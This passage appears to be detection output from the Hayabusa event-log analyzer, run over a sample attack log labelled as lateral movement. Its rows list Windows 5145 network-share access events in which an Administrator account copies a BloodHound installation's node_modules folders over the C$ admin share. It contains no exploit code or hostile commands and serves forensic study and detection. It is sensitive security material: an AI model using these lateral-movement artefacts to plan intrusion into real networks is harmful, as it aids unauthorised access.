Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.169 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.179 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP 
Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
